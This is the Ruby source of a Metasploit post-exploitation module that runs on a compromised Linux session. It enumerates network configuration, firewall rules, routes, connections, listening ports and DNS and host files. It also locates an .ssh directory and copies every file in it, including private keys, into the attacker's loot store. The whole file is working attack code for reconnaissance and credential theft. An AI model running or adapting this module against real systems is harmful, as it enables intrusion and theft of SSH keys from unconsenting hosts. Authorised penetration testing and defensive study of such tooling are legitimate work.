metasploit-framework/modules/post/linux/gather/enum_network.rb

132 lines
3.8 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Gather Network Information',
'Description' => %q{
This module gathers network information from the target system
IPTables rules, interfaces, wireless information, open and listening
ports, active network connections, DNS information and SSH information.
},
'License' => MSF_LICENSE,
'Author' => [
'ohdae <bindshell[at]live.com>', # minor additions, modifications & testing
'Stephen Haywood <averagesecurityguy[at]gmail.com>', # enum_linux
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
)
)
end
# Run Method for when run command is issued
def run
print_status("Running module against #{get_hostname} (#{session.session_host})")
user = execute('/usr/bin/whoami')
print_status("Module running as #{user}")
# Collect data
distro = get_sysinfo
print_good('Info:')
print_good("\t#{distro[:version]}")
print_good("\t#{distro[:kernel]}")
print_status('Collecting data...')
nconfig = execute('/sbin/ifconfig -a')
routes = execute('/sbin/route -e')
iptables = execute('/sbin/iptables -L')
iptables_nat = execute('/sbin/iptables -L -t nat')
iptables_man = execute('/sbin/iptables -L -t mangle')
resolv = cat_file('/etc/resolv.conf')
sshd_conf = cat_file('/etc/ssh/sshd_config')
hosts = cat_file('/etc/hosts')
connections = execute('/usr/bin/lsof -nPi')
wireless = execute('/sbin/iwconfig')
open_ports = execute('/bin/netstat -tulpn')
updown = execute('ls -R /etc/network')
ssh_keys = get_ssh_keys
# Save Enumerated data
save('Network config', nconfig)
save('Route table', routes)
save('Firewall config', iptables.to_s + iptables_nat.to_s + iptables_man.to_s)
save('DNS config', resolv)
save('SSHD config', sshd_conf)
save('Host file', hosts)
save('SSH keys', ssh_keys) unless ssh_keys.empty?
save('Active connections', connections)
save('Wireless information', wireless)
save('Listening ports', open_ports)
save('If-Up/If-Down', updown)
end
# Save enumerated data
def save(msg, data, ctype = 'text/plain')
unless data && !data.empty?
print_bad("Unable to get data for #{msg}")
return
end
ltype = 'linux.enum.network'
loot = store_loot(ltype, ctype, session, data, nil, msg)
print_good("#{msg} stored in #{loot}")
end
def execute(cmd)
verification_token = Rex::Text.rand_text_alpha(8)
vprint_status("Execute: #{cmd}")
output = cmd_exec(cmd + " || echo #{verification_token}")
return nil if output.include?(verification_token)
return output
end
def cat_file(filename)
vprint_status("Download: #{filename}")
output = read_file(filename)
return output
end
def get_ssh_keys
keys = []
# Look for .ssh folder, "~/" might not work everytime
vprint_status('Execute: /usr/bin/find / -maxdepth 3 -name .ssh')
dirs = cmd_exec('/usr/bin/find / -maxdepth 3 -name .ssh').split("\n")
ssh_base = ''
dirs.each do |d|
if d =~ %r{(^/)(.*)\.ssh$}
ssh_base = d
break
end
end
# We didn't find .ssh :-(
return [] if ssh_base == ''
# List all the files under .ssh/
files = execute("/bin/ls -a #{ssh_base}").chomp.split
files.each do |k|
next if k =~ /^(\.+)$/
this_key = cat_file("#{ssh_base}/#{k}")
keys << this_key
end
return keys
end
end